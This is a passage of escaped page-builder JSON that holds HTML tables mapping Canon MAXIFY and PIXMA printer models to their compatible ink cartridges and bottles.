width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td 